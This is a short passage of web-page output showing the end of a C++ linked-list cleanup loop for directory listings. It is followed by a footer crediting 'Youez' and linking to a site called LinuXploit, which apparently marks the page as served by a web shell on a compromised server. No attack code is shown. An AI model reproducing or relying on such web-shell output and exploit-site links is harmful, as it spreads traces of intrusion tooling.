		t_dirlisting *pPrev = pListing;
		pListing = pListing-&gt;pNext;
		delete pPrev;
	}
}
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>